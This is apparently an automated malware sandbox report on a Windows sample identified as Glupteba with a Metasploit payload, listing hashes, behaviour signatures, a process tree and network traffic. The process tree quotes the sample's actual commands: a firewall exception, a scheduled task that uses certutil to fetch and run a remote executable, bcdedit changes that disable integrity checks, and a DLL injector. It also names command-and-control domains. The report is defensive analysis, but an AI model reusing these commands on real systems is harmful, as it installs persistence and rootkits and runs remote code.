Analysis

  • max time kernel
    149s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-12-2024 20:52

General

  • Target

    JaffaCakes118_797d16436302c18db3594f4a5fd0cd4a1f23116f7bd333b27d2c59f27d4fe5d8.exe

  • Size

    4.5MB

  • MD5

    710c5be65f9008624031fd6e83f159a1

  • SHA1

    fc96bb430ee852591ec34ce6e93d4a07b37402a0

  • SHA256

    797d16436302c18db3594f4a5fd0cd4a1f23116f7bd333b27d2c59f27d4fe5d8

  • SHA512

    08a75bd757658ba88f732c73800ffaba1d5753d420a6c93ab1c00c568d78f88992638f571e9cc4d00ccbd72770efc9ff270217bb37b870d4f9c33b34930fa8b5

  • SSDEEP

    98304:/P7Hej7fFJry457Ijfkx0HgaJ9UtgL4x+Mxjwy:/P7+jTFB7IjfkmHg0gS4x3D

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba family
  • Glupteba payload 20 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • GoLang User-Agent 7 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_797d16436302c18db3594f4a5fd0cd4a1f23116f7bd333b27d2c59f27d4fe5d8.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_797d16436302c18db3594f4a5fd0cd4a1f23116f7bd333b27d2c59f27d4fe5d8.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1884
    • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_797d16436302c18db3594f4a5fd0cd4a1f23116f7bd333b27d2c59f27d4fe5d8.exe
      "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_797d16436302c18db3594f4a5fd0cd4a1f23116f7bd333b27d2c59f27d4fe5d8.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2936
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • Modifies data under HKEY_USERS
          PID:2660
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe /51-51
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:328
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:852
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2840
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1556
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1008
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2144
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:640
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2480
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:552
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:792
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:620
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2288
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:352
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1468
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1292
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2984
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2600
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:1620
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2212
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241226205221.log C:\Windows\Logs\CBS\CbsPersist_20241226205221.cab
    1⤵
    • Drops file in Windows directory
    PID:2760

Network

  • flag-us
    DNS
    ninhaine.com
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    ninhaine.com
    IN TXT
    Response
  • flag-us
    DNS
    2makestorage.com
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    2makestorage.com
    IN TXT
    Response
  • flag-us
    DNS
    nisdably.com
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    nisdably.com
    IN TXT
    Response
    nisdably.com
    IN TXT
    .v=spf1 include:_incspfcheck.mailspike.net ?all
  • flag-us
    DNS
    70ec1b1f-4f95-41e7-a4b7-1d75ad9e690e.ninhaine.com
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    70ec1b1f-4f95-41e7-a4b7-1d75ad9e690e.ninhaine.com
    IN TXT
    Response
  • flag-us
    DNS
    server12.ninhaine.com
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    server12.ninhaine.com
    IN A
    Response
    server12.ninhaine.com
    IN A
    46.8.8.145
  • flag-us
    DNS
    msdl.microsoft.com
    patch.exe
    Remote address:
    8.8.8.8:53
    Request
    msdl.microsoft.com
    IN A
    Response
    msdl.microsoft.com
    IN CNAME
    msdl.microsoft.akadns.net
    msdl.microsoft.akadns.net
    IN CNAME
    msdl-microsoft-com.a-0016.a-msedge.net
    msdl-microsoft-com.a-0016.a-msedge.net
    IN CNAME
    a-0016.a-msedge.net
    a-0016.a-msedge.net
    IN A
    204.79.197.219
  • flag-us
    GET
    https://msdl.microsoft.com/download/symbols/index2.txt
    patch.exe
    Remote address:
    204.79.197.219:443
    Request
    GET /download/symbols/index2.txt HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Host: msdl.microsoft.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    X-Cache: TCP_HIT
    Strict-Transport-Security: includeSubDomains
    X-MSEdge-Ref: Ref A: 228F913132254A6996852CB381921310 Ref B: LON04EDGE0710 Ref C: 2024-12-26T20:52:32Z
    Date: Thu, 26 Dec 2024 20:52:32 GMT
    Content-Length: 0
  • flag-us
    GET
    https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
    patch.exe
    Remote address:
    204.79.197.219:443
    Request
    GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Host: msdl.microsoft.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d
    X-Cache: TCP_MISS
    Strict-Transport-Security: includeSubDomains
    X-MSEdge-Ref: Ref A: 9A55A9B7210C432FA20CA2FF2D2C7B9D Ref B: LON04EDGE0710 Ref C: 2024-12-26T20:52:32Z
    Date: Thu, 26 Dec 2024 20:52:32 GMT
    Content-Length: 0
  • flag-us
    GET
    https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
    patch.exe
    Remote address:
    204.79.197.219:443
    Request
    GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Host: msdl.microsoft.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d
    X-Cache: TCP_HIT
    Strict-Transport-Security: includeSubDomains
    X-MSEdge-Ref: Ref A: 2E21B276657E4E82968EEE439C9F2B5A Ref B: LON04EDGE0710 Ref C: 2024-12-26T20:52:45Z
    Date: Thu, 26 Dec 2024 20:52:45 GMT
    Content-Length: 0
  • flag-us
    GET
    https://msdl.microsoft.com/download/symbols/index2.txt
    patch.exe
    Remote address:
    204.79.197.219:443
    Request
    GET /download/symbols/index2.txt HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Host: msdl.microsoft.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    X-Cache: TCP_HIT
    Strict-Transport-Security: includeSubDomains
    X-MSEdge-Ref: Ref A: 471F2AABC53E49D1820C0DD0DC13E81E Ref B: LON04EDGE0710 Ref C: 2024-12-26T20:53:00Z
    Date: Thu, 26 Dec 2024 20:53:00 GMT
    Content-Length: 0
  • flag-us
    GET
    https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
    patch.exe
    Remote address:
    204.79.197.219:443
    Request
    GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Host: msdl.microsoft.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d
    X-Cache: TCP_MISS
    Strict-Transport-Security: includeSubDomains
    X-MSEdge-Ref: Ref A: 5D3A2A06AA8F42EDA477FAC5AB0E3688 Ref B: LON04EDGE0710 Ref C: 2024-12-26T20:53:00Z
    Date: Thu, 26 Dec 2024 20:53:00 GMT
    Content-Length: 0
  • flag-us
    GET
    https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
    patch.exe
    Remote address:
    204.79.197.219:443
    Request
    GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Host: msdl.microsoft.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d
    X-Cache: TCP_HIT
    Strict-Transport-Security: includeSubDomains
    X-MSEdge-Ref: Ref A: CA1B5EA759CC40B6808690F1D3C2584A Ref B: LON04EDGE0710 Ref C: 2024-12-26T20:53:02Z
    Date: Thu, 26 Dec 2024 20:53:02 GMT
    Content-Length: 0
  • flag-us
    DNS
    vsblobprodscussu5shard30.blob.core.windows.net
    patch.exe
    Remote address:
    8.8.8.8:53
    Request
    vsblobprodscussu5shard30.blob.core.windows.net
    IN A
    Response
    vsblobprodscussu5shard30.blob.core.windows.net
    IN CNAME
    blob.sat09prdstrz08a.store.core.windows.net
    blob.sat09prdstrz08a.store.core.windows.net
    IN CNAME
    blob.sat09prdstrz08a.trafficmanager.net
    blob.sat09prdstrz08a.trafficmanager.net
    IN A
    20.150.79.68
    blob.sat09prdstrz08a.trafficmanager.net
    IN A
    20.150.38.228
    blob.sat09prdstrz08a.trafficmanager.net
    IN A
    20.150.70.36
  • flag-us
    GET
    https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d
    patch.exe
    Remote address:
    20.150.79.68:443
    Request
    GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: vsblobprodscussu5shard30.blob.core.windows.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 8752128
    Content-Type: application/octet-stream
    Content-Language: x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d
    Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
    Accept-Ranges: bytes
    ETag: "0x8D4B1DACA398C54"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 84fd35ee-c01e-007d-57d8-57146a000000
    x-ms-version: 2019-07-07
    x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    x-ms-server-encrypted: true
    Access-Control-Expose-Headers: Content-Length
    Access-Control-Allow-Origin: *
    Date: Thu, 26 Dec 2024 20:52:32 GMT
  • flag-us
    GET
    https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d
    patch.exe
    Remote address:
    20.150.79.68:443
    Request
    GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: vsblobprodscussu5shard30.blob.core.windows.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 8752128
    Content-Type: application/octet-stream
    Content-Language: x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d
    Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
    Accept-Ranges: bytes
    ETag: "0x8D4B1DACA398C54"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 84fd45f0-c01e-007d-65d8-57146a000000
    x-ms-version: 2019-07-07
    x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    x-ms-server-encrypted: true
    Access-Control-Expose-Headers: Content-Length
    Access-Control-Allow-Origin: *
    Date: Thu, 26 Dec 2024 20:52:44 GMT
  • flag-us
    DNS
    ww53.ninhaine.com
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    ww53.ninhaine.com
    IN A
    Response
    ww53.ninhaine.com
    IN CNAME
    g87442272.c.giantpanda.com
    g87442272.c.giantpanda.com
    IN A
    172.104.149.86
    g87442272.c.giantpanda.com
    IN A
    139.162.181.76
    g87442272.c.giantpanda.com
    IN A
    172.104.251.198
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Go-http-client/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:52:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=ea6bb6d0361ba5166edfb6ccb4d7bf5c; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:52:33 GMT
    Content-Encoding: gzip
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Go-http-client/1.1
    Content-Type: application/json; charset=UTF-8
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:52:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=97d19ac3ad729dee2131f922540a23f9; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:52:34 GMT
    Content-Encoding: gzip
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:52:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=c214d7a6d446bdc28726b349dcee14fb; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:52:37 GMT
    Content-Encoding: gzip
  • flag-us
    DNS
    ww82.ninhaine.com
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    ww82.ninhaine.com
    IN A
    Response
    ww82.ninhaine.com
    IN CNAME
    63214.bodis.com
    63214.bodis.com
    IN A
    199.59.243.227
  • flag-us
    GET
    http://ww82.ninhaine.com/
    csrss.exe
    Remote address:
    199.59.243.227:80
    Request
    GET / HTTP/1.1
    Host: ww82.ninhaine.com
    User-Agent: Go-http-client/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    date: Thu, 26 Dec 2024 20:52:37 GMT
    content-type: text/html; charset=utf-8
    content-length: 1054
    x-request-id: c31f6061-1dd9-49d1-be23-ae2204155bc3
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
    set-cookie: parking_session=c31f6061-1dd9-49d1-be23-ae2204155bc3; expires=Thu, 26 Dec 2024 21:07:38 GMT; path=/
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:52:43 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
